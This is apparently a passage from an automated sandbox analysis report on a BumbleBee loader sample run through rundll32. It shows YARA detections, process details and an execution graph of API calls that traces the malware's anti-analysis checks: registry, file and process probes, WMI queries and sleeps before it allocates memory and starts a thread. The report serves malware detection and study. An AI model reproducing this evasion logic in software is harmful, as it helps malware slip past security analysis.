                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Target ID:2
                                      Start time:16:08:29
                                      Start date:09/05/2022
                                      Path:C:\Windows\System32\rundll32.exe
                                      Wow64 process (32bit):false
                                      Commandline:rundll32.exe C:\Users\user\Desktop\mount.dll,shjKeAQfgT
                                      Imagebase:0x7ff71da80000
                                      File size:69632 bytes
                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_BumbleBee, Description: Yara detected BumbleBee, Source: 00000002.00000003.333797150.000001B97EC0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high

                                      General

                                      Target ID:3
                                      Start time:16:08:29
                                      Start date:09/05/2022
                                      Path:C:\Windows\System32\rundll32.exe
                                      Wow64 process (32bit):false
                                      Commandline:rundll32.exe "C:\Users\user\Desktop\mount.dll",#1
                                      Imagebase:0x7ff71da80000
                                      File size:69632 bytes
                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_BumbleBee, Description: Yara detected BumbleBee, Source: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_BumbleBee, Description: Yara detected BumbleBee, Source: 00000003.00000003.333897258.0000021EF3D7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high

                                      General

                                      Target ID:4
                                      Start time:16:08:34
                                      Start date:09/05/2022
                                      Path:C:\Windows\System32\rundll32.exe
                                      Wow64 process (32bit):false
                                      Commandline:rundll32.exe "C:\Users\user\Desktop\mount.dll",shjKeAQfgT
                                      Imagebase:0x7ff71da80000
                                      File size:69632 bytes
                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_BumbleBee, Description: Yara detected BumbleBee, Source: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_BumbleBee, Description: Yara detected BumbleBee, Source: 00000004.00000003.338592600.000001C33946D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:1.9%
                                        Dynamic/Decrypted Code Coverage:0.2%
                                        Signature Coverage:31.5%
                                        Total number of Nodes:635
                                        Total number of Limit Nodes:20
                                        execution_graph 47254 21ef3126904 47255 21ef3126919 _com_util::ConvertStringToBSTR 47254->47255 47259 21ef312692d 47255->47259 47277 21ef3126f7c TlsGetValue 47255->47277 47261 21ef3126976 47259->47261 47273 21ef3122114 47259->47273 47260 21ef312694c 47278 21ef3124ee0 47260->47278 47263 21ef3126985 SetLastError 47261->47263 47264 21ef312697b SetLastError 47261->47264 47265 21ef3126990 47263->47265 47264->47265 47267 21ef3126963 47267->47260 47269 21ef312696a 47267->47269 47268 21ef3126953 47268->47264 47283 21ef31265dc SetLastError SetLastError TlsGetValue TlsSetValue _invalid_parameter_noinfo 47269->47283 47271 21ef312696f 47272 21ef3124ee0 __free_lconv_mon 2 API calls 47271->47272 47272->47261 47274 21ef3122125 _Getctype new 47273->47274 47276 21ef3122174 47274->47276 47284 21ef3118984 SetLastError SetLastError TlsGetValue TlsSetValue _invalid_parameter_noinfo 47274->47284 47276->47260 47282 21ef3126fd4 TlsSetValue 47276->47282 47277->47259 47279 21ef3124ee5 __free_lconv_mon 47278->47279 47281 21ef3124f05 __free_lconv_mon _com_util::ConvertStringToBSTR 47278->47281 47279->47281 47285 21ef3118984 SetLastError SetLastError TlsGetValue TlsSetValue _invalid_parameter_noinfo 47279->47285 47281->47268 47282->47267 47283->47271 47284->47276 47285->47281 47286 21ef312b524 47291 21ef312b547 _Init_thread_footer abort 47286->47291 47287 21ef312b593 47291->47287 47292 21ef312b27c 47291->47292 47293 21ef3122114 _Getctype 4 API calls 47292->47293 47295 21ef312b29c 47293->47295 47294 21ef312b2ef 47296 21ef3124ee0 __free_lconv_mon 4 API calls 47294->47296 47295->47294 47300 21ef312722c InitializeCriticalSectionAndSpinCount 47295->47300 47297 21ef312b2f9 47296->47297 47297->47287 47299 21ef312b41c EnterCriticalSection 47297->47299 47300->47295 47301 21ef301dce2 47303 21ef301dcfe 47301->47303 47302 21ef301df24 47303->47302 47358 21ef301e190 47303->47358 47311 21ef301dd47 47311->47302 47398 21ef3020fd0 GetProcessHeap 47311->47398 47313 21ef301dd63 47410 21ef301e7d0 47313->47410 47316 21ef301dda8 47417 21ef301e8f0 47316->47417 47318 21ef301ddb2 47426 21ef301e990 47318->47426 47322 21ef301ddd3 47445 21ef301ec20 47322->47445 47324 21ef301dde1 47467 21ef301f520 47324->47467 47326 21ef301de0b 47480 21ef301f730 47326->47480 47328 21ef301de19 47494 21ef301f120 47328->47494 47330 21ef301de27 47507 21ef301f300 47330->47507 47332 21ef301de35 47520 21ef301f9c0 47332->47520 47334 21ef301de43 47334->47302 47535 21ef3020c70 47334->47535 47342 21ef301de88 47342->47302 47563 21ef3020250 47342->47563 47348 21ef301ded1 47348->47302 47597 21ef3020bc0 47348->47597 47351 21ef3020fd0 6 API calls 47352 21ef301def7 47351->47352 47352->47302 47603 21ef30209c0 47352->47603 47359 21ef301e250 memcpy_s 47358->47359 47361 21ef301e2aa 47359->47361 47630 21ef3020ee0 47359->47630 47640 21ef310c290 47361->47640 47363 21ef301dd1d 47364 21ef301e2e0 47363->47364 47365 21ef301e380 memcpy_s 47364->47365 47366 21ef301e3b6 RegOpenKeyExW 47365->47366 47368 21ef301e3eb 47365->47368 47366->47365 47367 21ef301e3ef RegCloseKey 47366->47367 47367->47368 47369 21ef310c290 _com_util::ConvertStringToBSTR 4 API calls 47368->47369 47370 21ef301dd2b 47369->47370 47371 21ef301e430 47370->47371 47372 21ef301e539 memcpy_s 47371->47372 47373 21ef301e54a GetWindowsDirectoryW 47372->47373 47374 21ef301e568 47373->47374 47375 21ef301e56c Wow64DisableWow64FsRedirection 47374->47375 47377 21ef301e577 memcpy_s 47374->47377 47375->47377 47376 21ef301e580 PathCombineW 47376->47377 47377->47376 47378 21ef301e5c6 GetFileAttributesW 47377->47378 47382 21ef301e5e2 47377->47382 47378->47377 47379 21ef301e610 47380 21ef310c290 _com_util::ConvertStringToBSTR 4 API calls 47379->47380 47381 21ef301dd39 47380->47381 47386 21ef301e6a0 47381->47386 47382->47379 47383 21ef301e64f GetCurrentProcess 47382->47383 47384 21ef301e65f 47383->47384 47384->47379 47385 21ef301e666 Wow64RevertWow64FsRedirection 47384->47385 47385->47379 47387 21ef301e6ce memcpy_s 47386->47387 47388 21ef301e737 ExpandEnvironmentStringsW 47387->47388 47389 21ef301e74c SHGetSpecialFolderPathW 47387->47389 47390 21ef301e75b PathCombineW GetFileAttributesW 47388->47390 47389->47390 47391 21ef301e789 47390->47391 47392 21ef301e7aa 47390->47392 47391->47392 47393 21ef301e78d 47391->47393 47394 21ef310c290 _com_util::ConvertStringToBSTR 4 API calls 47392->47394 47395 21ef310c290 _com_util::ConvertStringToBSTR 4 API calls 47393->47395 47396 21ef301e7bc 47394->47396 47397 21ef301e7a2 47395->47397 47396->47311 47397->47311 47399 21ef3021003 _Getctype 47398->47399 47400 21ef302101d GetAdaptersInfo 47399->47400 47401 21ef302100b 47399->47401 47402 21ef3021030 GetProcessHeap 47400->47402 47403 21ef3021072 GetProcessHeap 47400->47403 47401->47313 47650 21ef3144240 47402->47650 47406 21ef30210ce __free_lconv_mon 47403->47406 47406->47313 47411 21ef301e840 CreateFileW 47410->47411 47412 21ef301e884 memcpy_s 47411->47412 47412->47411 47413 21ef301e8b0 CloseHandle 47412->47413 47414 21ef301e8ac 47412->47414 47413->47414 47415 21ef310c290 _com_util::ConvertStringToBSTR 4 API calls 47414->47415 47416 21ef301dd72 FindWindowW FindWindowW 47415->47416 47416->47316 47418 21ef310e410 memcpy_s 47417->47418 47419 21ef301e91b WNetGetProviderNameW 47418->47419 47420 21ef301e96f 47419->47420 47421 21ef301e93c StrCmpIW 47419->47421 47423 21ef310c290 _com_util::ConvertStringToBSTR 4 API calls 47420->47423 47422 21ef310c290 _com_util::ConvertStringToBSTR 4 API calls 47421->47422 47424 21ef301e967 47422->47424 47425 21ef301e981 47423->47425 47424->47318 47425->47318 47427 21ef301e9d0 memcpy_s 47426->47427 47429 21ef301ea15 47427->47429 47651 21ef30210e0 CreateToolhelp32Snapshot 47427->47651 47430 21ef310c290 _com_util::ConvertStringToBSTR 4 API calls 47429->47430 47431 21ef301ddc5 47430->47431 47432 21ef301ea40 47431->47432 47663 21ef30211c0 CoInitializeEx 47432->47663 47434 21ef301ec15 47434->47322 47435 21ef301eb0a 47436 21ef301eb14 SysFreeString 47435->47436 47443 21ef301eb1d wcsstr 47435->47443 47436->47443 47437 21ef301eb01 SysFreeString 47437->47435 47438 21ef301ec05 47438->47322 47439 21ef301ebdf CoUninitialize 47439->47438 47440 21ef301ea6b _com_util::ConvertStringToBSTR 47440->47434 47440->47435 47440->47437 47441 21ef301eafb CoUninitialize 47440->47441 47441->47437 47443->47438 47443->47439 47444 21ef301ebba VariantClear 47443->47444 47444->47443 47446 21ef30211c0 8 API calls 47445->47446 47451 21ef301ec80 _com_util::ConvertStringToBSTR 47446->47451 47447 21ef301eef7 47448 21ef310c290 _com_util::ConvertStringToBSTR 4 API calls 47447->47448 47449 21ef301ef1e 47448->47449 47449->47324 47450 21ef301ed20 47453 21ef301ed2e 47450->47453 47454 21ef301ed25 SysFreeString 47450->47454 47451->47447 47451->47450 47452 21ef301ed17 SysFreeString 47451->47452 47456 21ef301ed11 CoUninitialize 47451->47456 47452->47450 47453->47447 47455 21ef301eec9 CoUninitialize 47453->47455 47458 21ef301edc0 StrCmpIW 47453->47458 47459 21ef301eea8 VariantClear 47453->47459 47454->47453 47455->47447 47456->47452 47458->47459 47460 21ef301edd9 VariantClear 47458->47460 47459->47453 47461 21ef301ee05 SafeArrayAccessData 47460->47461 47461->47459 47462 21ef301ee1e SafeArrayGetLBound SafeArrayGetUBound 47461->47462 47463 21ef301ee50 SafeArrayGetElement 47462->47463 47464 21ef301ee9f SafeArrayUnaccessData 47462->47464 47466 21ef301ee70 47463->47466 47464->47459 47466->47463 47466->47464 47675 21ef3120790 17 API calls 3 library calls 47466->47675 47468 21ef30211c0 8 API calls 47467->47468 47474 21ef301f545 _com_util::ConvertStringToBSTR 47468->47474 47469 21ef301f723 47469->47326 47470 21ef301f5e4 47472 21ef301f5e9 SysFreeString 47470->47472 47479 21ef301f5f2 wcsstr 47470->47479 47471 21ef301f5db SysFreeString 47471->47470 47472->47479 47473 21ef301f70b 47473->47326 47474->47469 47474->47470 47474->47471 47476 21ef301f5d5 CoUninitialize 47474->47476 47475 21ef301f6da CoUninitialize 47475->47473 47476->47471 47478 21ef301f6b9 VariantClear 47478->47479 47479->47473 47479->47475 47479->47478 47481 21ef30211c0 8 API calls 47480->47481 47488 21ef301f760 _com_util::ConvertStringToBSTR 47481->47488 47482 21ef301f9a7 47482->47328 47483 21ef301f805 47484 21ef301f812 SysFreeString 47483->47484 47492 21ef301f81b wcsstr 47483->47492 47484->47492 47485 21ef301f7fc SysFreeString 47485->47483 47486 21ef301f994 47486->47328 47487 21ef301f96e CoUninitialize 47487->47486 47488->47482 47488->47483 47488->47485 47489 21ef301f7f6 CoUninitialize 47488->47489 47489->47485 47491 21ef301f8cd VariantClear 47491->47492 47492->47486 47492->47487 47492->47491 47493 21ef301f949 VariantClear 47492->47493 47493->47492 47495 21ef30211c0 8 API calls 47494->47495 47502 21ef301f14b _com_util::ConvertStringToBSTR 47495->47502 47496 21ef301f2ec 47496->47330 47497 21ef301f1ea 47499 21ef301f1f4 SysFreeString 47497->47499 47506 21ef301f1fd wcsstr 47497->47506 47498 21ef301f1e1 SysFreeString 47498->47497 47499->47506 47500 21ef301f2dc 47500->47330 47501 21ef301f2b8 CoUninitialize 47501->47500 47502->47496 47502->47497 47502->47498 47503 21ef301f1db CoUninitialize 47502->47503 47503->47498 47505 21ef301f293 VariantClear 47505->47506 47506->47500 47506->47501 47506->47505 47508 21ef30211c0 8 API calls 47507->47508 47515 21ef301f325 _com_util::ConvertStringToBSTR 47508->47515 47509 21ef301f50b 47509->47332 47510 21ef301f3ba 47511 21ef301f3c4 SysFreeString 47510->47511 47512 21ef301f3cd wcsstr 47510->47512 47511->47512 47514 21ef301f4fd 47512->47514 47516 21ef301f4d0 CoUninitialize 47512->47516 47519 21ef301f4af VariantClear 47512->47519 47513 21ef301f3b1 SysFreeString 47513->47510 47514->47332 47515->47509 47515->47510 47515->47513 47517 21ef301f3ab CoUninitialize 47515->47517 47516->47514 47517->47513 47519->47512 47521 21ef30211c0 8 API calls 47520->47521 47528 21ef301f9eb _com_util::ConvertStringToBSTR 47521->47528 47522 21ef301fc43 47522->47334 47523 21ef301fa8a 47524 21ef301fa94 SysFreeString 47523->47524 47525 21ef301fa9d wcsstr 47523->47525 47524->47525 47527 21ef301fc33 47525->47527 47529 21ef301fc0d CoUninitialize 47525->47529 47532 21ef301fb3e VariantClear 47525->47532 47533 21ef301fb93 VariantClear 47525->47533 47534 21ef301fbe8 VariantClear 47525->47534 47526 21ef301fa81 SysFreeString 47526->47523 47527->47334 47528->47522 47528->47523 47528->47526 47530 21ef301fa7b CoUninitialize 47528->47530 47529->47527 47530->47526 47532->47525 47533->47525 47534->47525 47536 21ef3020cb0 memcpy_s 47535->47536 47537 21ef30210e0 12 API calls 47536->47537 47538 21ef3020cf5 47536->47538 47537->47536 47539 21ef310c290 _com_util::ConvertStringToBSTR 4 API calls 47538->47539 47540 21ef301de57 47539->47540 47540->47302 47541 21ef301fc50 47540->47541 47542 21ef301fcc0 memcpy_s 47541->47542 47543 21ef3020ee0 9 API calls 47542->47543 47544 21ef301fd0c 47542->47544 47543->47542 47545 21ef310c290 _com_util::ConvertStringToBSTR 4 API calls 47544->47545 47546 21ef301de6c 47545->47546 47547 21ef301fd40 47546->47547 47548 21ef301fd90 memcpy_s 47547->47548 47549 21ef30210e0 12 API calls 47548->47549 47550 21ef301fdd5 47548->47550 47549->47548 47551 21ef310c290 _com_util::ConvertStringToBSTR 4 API calls 47550->47551 47552 21ef301de7a 47551->47552 47553 21ef301fe00 47552->47553 47556 21ef301fe36 memcpy_s 47553->47556 47554 21ef301fea8 SHGetSpecialFolderPathW 47555 21ef301febf PathCombineW 47554->47555 47555->47556 47556->47554 47557 21ef301fef5 GetFileAttributesW 47556->47557 47558 21ef301ff79 GetCurrentProcess 47556->47558 47559 21ef301ff1a 47556->47559 47561 21ef301ff93 ExpandEnvironmentStringsW 47556->47561 47557->47556 47558->47556 47560 21ef310c290 _com_util::ConvertStringToBSTR 4 API calls 47559->47560 47562 21ef301ff34 47560->47562 47561->47555 47562->47342 47564 21ef30202d0 memcpy_s 47563->47564 47565 21ef3020300 RegOpenKeyExW 47564->47565 47567 21ef3020335 47564->47567 47565->47564 47566 21ef3020339 RegCloseKey 47565->47566 47566->47567 47568 21ef310c290 _com_util::ConvertStringToBSTR 4 API calls 47567->47568 47569 21ef301deb5 47568->47569 47570 21ef3020370 47569->47570 47571 21ef302042c memcpy_s 47570->47571 47572 21ef302043d GetWindowsDirectoryW 47571->47572 47573 21ef302045b 47572->47573 47574 21ef302045f Wow64DisableWow64FsRedirection 47573->47574 47576 21ef302046a memcpy_s 47573->47576 47574->47576 47575 21ef3020470 PathCombineW 47575->47576 47576->47575 47577 21ef30204b6 GetFileAttributesW 47576->47577 47581 21ef30204d2 47576->47581 47577->47576 47578 21ef3020500 47579 21ef310c290 _com_util::ConvertStringToBSTR 4 API calls 47578->47579 47580 21ef301dec3 47579->47580 47585 21ef3020590 47580->47585 47581->47578 47582 21ef302053f GetCurrentProcess 47581->47582 47583 21ef302054f 47582->47583 47583->47578 47584 21ef3020556 Wow64RevertWow64FsRedirection 47583->47584 47584->47578 47586 21ef30205be memcpy_s 47585->47586 47587 21ef3020610 SHGetSpecialFolderPathW 47586->47587 47588 21ef30205fb ExpandEnvironmentStringsW 47586->47588 47589 21ef302061f PathCombineW GetFileAttributesW 47587->47589 47588->47589 47590 21ef302066e 47589->47590 47591 21ef302064d 47589->47591 47592 21ef310c290 _com_util::ConvertStringToBSTR 4 API calls 47590->47592 47591->47590 47593 21ef3020651 47591->47593 47594 21ef3020680 47592->47594 47595 21ef310c290 _com_util::ConvertStringToBSTR 4 API calls 47593->47595 47594->47348 47596 21ef3020666 47595->47596 47596->47348 47598 21ef3020c00 memcpy_s 47597->47598 47599 21ef30210e0 12 API calls 47598->47599 47600 21ef3020c45 47598->47600 47599->47598 47601 21ef310c290 _com_util::ConvertStringToBSTR 4 API calls 47600->47601 47602 21ef301dee2 47601->47602 47602->47351 47604 21ef30211c0 8 API calls 47603->47604 47610 21ef30209e5 _com_util::ConvertStringToBSTR 47604->47610 47605 21ef301df08 47605->47302 47619 21ef3020770 47605->47619 47606 21ef3020a7a 47607 21ef3020a84 SysFreeString 47606->47607 47612 21ef3020a8d 47606->47612 47607->47612 47608 21ef3020a71 SysFreeString 47608->47606 47609 21ef3020b75 CoUninitialize 47609->47605 47610->47605 47610->47606 47610->47608 47611 21ef3020a6b CoUninitialize 47610->47611 47611->47608 47612->47605 47612->47609 47614 21ef3020b54 VariantClear 47612->47614 47615 21ef3020b12 StrStrIW 47612->47615 47614->47612 47616 21ef3020b28 StrStrIW 47615->47616 47617 21ef3020b77 VariantClear 47615->47617 47616->47617 47618 21ef3020b3e StrStrIW 47616->47618 47617->47609 47618->47614 47618->47617 47620 21ef3020879 47619->47620 47621 21ef3020881 GetUserNameW 47620->47621 47622 21ef3020893 47620->47622 47621->47622 47625 21ef30208b9 47621->47625 47623 21ef310c290 _com_util::ConvertStringToBSTR 4 API calls 47622->47623 47624 21ef301df18 47623->47624 47624->47302 47627 21ef3020950 GlobalMemoryStatusEx 47624->47627 47625->47622 47676 21ef3120790 17 API calls 3 library calls 47625->47676 47628 21ef310c290 _com_util::ConvertStringToBSTR 4 API calls 47627->47628 47629 21ef30209bb 47628->47629 47629->47302 47647 21ef310e410 47630->47647 47633 21ef3020f50 RegQueryValueExW 47635 21ef3020fa1 RegCloseKey 47633->47635 47636 21ef3020f7c StrStrIW 47633->47636 47634 21ef3020fac 47638 21ef310c290 _com_util::ConvertStringToBSTR 4 API calls 47634->47638 47635->47634 47636->47635 47637 21ef3020f8f RegCloseKey 47636->47637 47637->47634 47639 21ef3020fbe 47638->47639 47639->47359 47641 21ef310c29a 47640->47641 47642 21ef310c2a6 47641->47642 47643 21ef310c2e8 IsProcessorFeaturePresent 47641->47643 47642->47363 47644 21ef310c2ff 47643->47644 47649 21ef310c4dc RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 47644->47649 47646 21ef310c312 47646->47363 47648 21ef3020f21 RegOpenKeyExW 47647->47648 47648->47633 47648->47634 47649->47646 47652 21ef3021124 Process32FirstW 47651->47652 47653 21ef302119d 47651->47653 47654 21ef302113e StrCmpIW 47652->47654 47655 21ef3021194 CloseHandle 47652->47655 47656 21ef310c290 _com_util::ConvertStringToBSTR 4 API calls 47653->47656 47657 21ef302115f Process32NextW 47654->47657 47658 21ef3021153 CloseHandle 47654->47658 47655->47653 47659 21ef30211af 47656->47659 47657->47655 47660 21ef302116e 47657->47660 47658->47653 47659->47427 47661 21ef3021170 StrCmpIW 47660->47661 47661->47658 47662 21ef3021185 Process32NextW 47661->47662 47662->47655 47662->47661 47664 21ef30211de 47663->47664 47665 21ef30211eb CoInitializeSecurity 47663->47665 47664->47440 47666 21ef3021221 CoCreateInstance 47665->47666 47667 21ef3021244 CoUninitialize 47665->47667 47666->47667 47668 21ef302125c _com_util::ConvertStringToBSTR 47666->47668 47667->47440 47669 21ef30212ba CoSetProxyBlanket 47668->47669 47671 21ef30212b4 SysFreeString 47668->47671 47672 21ef30212ac SysFreeString 47668->47672 47670 21ef3021306 47669->47670 47673 21ef30212ea CoUninitialize 47669->47673 47670->47440 47671->47669 47672->47673 47673->47670 47675->47466 47676->47625 47677 21ef3122878 47680 21ef3122887 _Getctype new 47677->47680 47679 21ef31228c1 47680->47679 47681 21ef3118984 SetLastError SetLastError TlsGetValue TlsSetValue _invalid_parameter_noinfo 47680->47681 47681->47679 47682 21ef30201d8 RegOpenKeyExW 47683 21ef3020234 47682->47683 47684 21ef302020c RegCloseKey 47682->47684 47686 21ef310c290 _com_util::ConvertStringToBSTR 4 API calls 47683->47686 47685 21ef310c290 _com_util::ConvertStringToBSTR 4 API calls 47684->47685 47687 21ef302022c 47685->47687 47688 21ef3020246 47686->47688 47689 21ef2fe59d0 47694 21ef310ba74 47689->47694 47692 21ef2fe5a0b 47693 21ef2fe59f7 WSAStartup 47693->47692 47697 21ef310ba24 47694->47697 47696 21ef2fe59e3 47696->47692 47696->47693 47698 21ef310ba53 47697->47698 47700 21ef310ba49 _onexit 47697->47700 47701 21ef31260a4 5 API calls _onexit 47698->47701 47700->47696 47701->47700 47702 21ef2fe9070 47814 21ef3111c60 15 API calls _Tolower 47702->47814 47704 21ef2fe9075 Sleep SleepEx 47704->47702 47705 21ef2fe90ac ExitProcess 47704->47705 47706 21ef2fe912d 47705->47706 47707 21ef2fe9124 WaitForSingleObject 47705->47707 47709 21ef2fe9151 47706->47709 47775 21ef2fe6530 47706->47775 47707->47706 47815 21ef3111f70 47709->47815 47717 21ef2fe91ec 47718 21ef2fe6400 5 API calls 47717->47718 47719 21ef2fe9233 CoInitializeEx CoInitializeSecurity 47718->47719 47806 21ef301b3f0 GetModuleHandleW 47719->47806 47722 21ef2fe92ba CloseHandle 47723 21ef2fe92e5 CoUninitialize ExitProcess 47722->47723 47724 21ef2fe92c4 _com_util::ConvertStringToBSTR 47723->47724 47843 21ef2fe1610 21 API calls ctype 47724->47843 47726 21ef2fe940c 47844 21ef2fe3600 21 API calls memcpy_s 47726->47844 47728 21ef2fe9418 47845 21ef2fe1440 5 API calls memcpy_s 47728->47845 47730 21ef2fe942b 47846 21ef2feb0a0 RaiseException SetLastError SetLastError TlsGetValue TlsSetValue 47730->47846 47732 21ef2fe944c 47847 21ef2feb0a0 RaiseException SetLastError SetLastError TlsGetValue TlsSetValue 47732->47847 47734 21ef2fe946e 47848 21ef301cf50 RaiseException SetLastError SetLastError TlsGetValue TlsSetValue 47734->47848 47736 21ef2fe947b 47737 21ef2fe6530 5 API calls 47736->47737 47738 21ef2fe957f 47737->47738 47739 21ef2fe6400 5 API calls 47738->47739 47740 21ef2fe9603 47739->47740 47741 21ef2fe6400 5 API calls 47740->47741 47752 21ef2fe9654 47741->47752 47743 21ef2fea821 Sleep 47743->47752 47747 21ef2fea70b 47853 21ef3111c60 15 API calls _Tolower 47747->47853 47854 21ef3111c60 15 API calls _Tolower 47747->47854 47749 21ef2fea710 Sleep 47749->47752 47751 21ef2fead20 47751->47751 47752->47747 47752->47751 47753 21ef2feaab5 47752->47753 47849 21ef2ff5850 72 API calls _CxxThrowException 47752->47849 47850 21ef2ff5cd0 72 API calls _CxxThrowException 47752->47850 47851 21ef2febb60 RaiseException 47752->47851 47852 21ef2fe5d10 19 API calls 47752->47852 47754 21ef2fe6530 5 API calls 47753->47754 47755 21ef2feab02 47754->47755 47756 21ef2fe6400 5 API calls 47755->47756 47757 21ef2feab30 __security_init_cookie 47756->47757 47855 21ef2fe9020 RaiseException SetLastError SetLastError TlsGetValue TlsSetValue 47757->47855 47759 21ef2feab43 47856 21ef2feb660 RaiseException SetLastError SetLastError TlsGetValue TlsSetValue 47759->47856 47761 21ef2feab50 47857 21ef2fe82c0 5 API calls ctype 47761->47857 47763 21ef2feab64 47858 21ef2fe8170 5 API calls ctype 47763->47858 47765 21ef2feac4b 47859 21ef2fe82c0 5 API calls ctype 47765->47859 47767 21ef2feac62 47860 21ef2fe8170 5 API calls ctype 47767->47860 47769 21ef2feac78 47861 21ef2fe8170 5 API calls ctype 47769->47861 47771 21ef2feac9e 47862 21ef2feaf10 RaiseException SetLastError SetLastError TlsGetValue TlsSetValue 47771->47862 47773 21ef2feacc3 47863 21ef2ff5cd0 72 API calls _CxxThrowException 47773->47863 47776 21ef2fe6637 47775->47776 47777 21ef2fe655e 47775->47777 47865 21ef310a1d4 5 API calls _CxxThrowException 47776->47865 47779 21ef2fe659c 47777->47779 47780 21ef2fe656d 47777->47780 47781 21ef2fe65a6 47779->47781 47782 21ef2fe6650 47779->47782 47787 21ef2fe657b ctype 47780->47787 47866 21ef310a1d4 5 API calls _CxxThrowException 47780->47866 47781->47787 47864 21ef2fe68c0 RaiseException Concurrency::cancel_current_task ctype new 47781->47864 47867 21ef310a1b0 5 API calls _CxxThrowException 47782->47867 47787->47709 47788 21ef3111df0 47789 21ef3111e20 47788->47789 47790 21ef3111e09 47788->47790 47868 21ef3111d90 47789->47868 47875 21ef3118984 SetLastError SetLastError TlsGetValue TlsSetValue _invalid_parameter_noinfo 47790->47875 47793 21ef3111e0e 47876 21ef3111bc8 SetLastError SetLastError TlsGetValue TlsSetValue _invalid_parameter_noinfo 47793->47876 47795 21ef3111e33 CreateThread 47797 21ef3111e63 _com_util::ConvertStringToBSTR 47795->47797 47799 21ef3111e70 47795->47799 47877 21ef3118914 4 API calls 2 library calls 47797->47877 47798 21ef2fe9196 47821 21ef2fe6400 47798->47821 47799->47798 47800 21ef3111e80 CloseHandle 47799->47800 47801 21ef3111e86 47799->47801 47800->47801 47803 21ef3111e8f FreeLibrary 47801->47803 47804 21ef3111e95 47801->47804 47803->47804 47805 21ef3124ee0 __free_lconv_mon 4 API calls 47804->47805 47805->47798 47807 21ef2fe929a CreateEventW 47806->47807 47808 21ef301b415 GetProcAddress 47806->47808 47807->47722 47807->47724 47809 21ef301b431 47808->47809 47810 21ef301b438 GetProcAddress 47808->47810 47809->47807 47810->47809 47811 21ef301b454 GetProcAddress 47810->47811 47811->47809 47812 21ef301b470 GetProcAddress 47811->47812 47812->47809 47813 21ef301b48c GetProcAddress 47812->47813 47813->47807 47814->47704 47878 21ef3111ed8 47815->47878 47817 21ef2fe916a 47818 21ef3111c8c 47817->47818 47886 21ef3126870 47818->47886 47820 21ef2fe9172 47820->47788 47822 21ef2fe6477 47821->47822 47826 21ef2fe641d 47821->47826 47823 21ef2fe6523 47822->47823 47824 21ef2fe6481 47822->47824 47911 21ef310a1b0 5 API calls _CxxThrowException 47823->47911 47830 21ef2fe6496 ctype 47824->47830 47910 21ef2fe68c0 RaiseException Concurrency::cancel_current_task ctype new 47824->47910 47826->47822 47829 21ef2fe6446 47826->47829 47831 21ef2fe6637 47829->47831 47832 21ef2fe655e 47829->47832 47830->47717 47913 21ef310a1d4 5 API calls _CxxThrowException 47831->47913 47834 21ef2fe659c 47832->47834 47835 21ef2fe656d 47832->47835 47836 21ef2fe65a6 47834->47836 47837 21ef2fe6650 47834->47837 47842 21ef2fe657b ctype 47835->47842 47914 21ef310a1d4 5 API calls _CxxThrowException 47835->47914 47836->47842 47912 21ef2fe68c0 RaiseException Concurrency::cancel_current_task ctype new 47836->47912 47915 21ef310a1b0 5 API calls _CxxThrowException 47837->47915 47842->47717 47843->47726 47844->47728 47845->47730 47846->47732 47847->47734 47848->47736 47849->47752 47850->47752 47851->47752 47852->47752 47853->47749 47854->47743 47855->47759 47856->47761 47857->47763 47858->47765 47859->47767 47860->47769 47861->47771 47862->47773 47863->47751 47864->47787 47865->47780 47866->47782 47869 21ef3122114 _Getctype 4 API calls 47868->47869 47870 21ef3111db2 47869->47870 47871 21ef3124ee0 __free_lconv_mon 4 API calls 47870->47871 47872 21ef3111dbc 47871->47872 47873 21ef3111dc3 GetModuleHandleExW 47872->47873 47874 21ef3111ddd 47872->47874 47873->47874 47874->47795 47874->47799 47875->47793 47876->47798 47877->47799 47879 21ef3111ee6 47878->47879 47883 21ef3111ef6 47878->47883 47884 21ef3118984 SetLastError SetLastError TlsGetValue TlsSetValue _invalid_parameter_noinfo 47879->47884 47881 21ef3111eeb 47885 21ef3111bc8 SetLastError SetLastError TlsGetValue TlsSetValue _invalid_parameter_noinfo 47881->47885 47883->47817 47884->47881 47885->47883 47887 21ef3126880 _com_util::ConvertStringToBSTR 47886->47887 47888 21ef3126892 47887->47888 47906 21ef3126f7c TlsGetValue 47887->47906 47890 21ef3122114 _Getctype 4 API calls 47888->47890 47893 21ef31268db 47888->47893 47891 21ef31268a9 47890->47891 47892 21ef31268b1 47891->47892 47907 21ef3126fd4 TlsSetValue 47891->47907 47897 21ef3124ee0 __free_lconv_mon 4 API calls 47892->47897 47895 21ef31268e0 SetLastError 47893->47895 47896 21ef31268f6 SetLastError 47893->47896 47895->47820 47909 21ef311f8c8 15 API calls abort 47896->47909 47900 21ef31268b8 47897->47900 47898 21ef31268c8 47898->47892 47901 21ef31268cf 47898->47901 47900->47896 47908 21ef31265dc SetLastError SetLastError TlsGetValue TlsSetValue _invalid_parameter_noinfo 47901->47908 47904 21ef31268d4 47905 21ef3124ee0 __free_lconv_mon 4 API calls 47904->47905 47905->47893 47906->47888 47907->47898 47908->47904 47910->47830 47912->47842 47913->47835 47914->47837 47916 21ef2feae60 47917 21ef2feae75 47916->47917 47923 21ef2feaefe 47916->47923 47918 21ef2feae9a 47917->47918 47919 21ef2feaea4 VirtualAlloc 47917->47919 47924 21ef301b69c GetModuleHandleA 47918->47924 47919->47918 47922 21ef3111df0 8 API calls 47922->47923 47925 21ef301b6c9 47924->47925 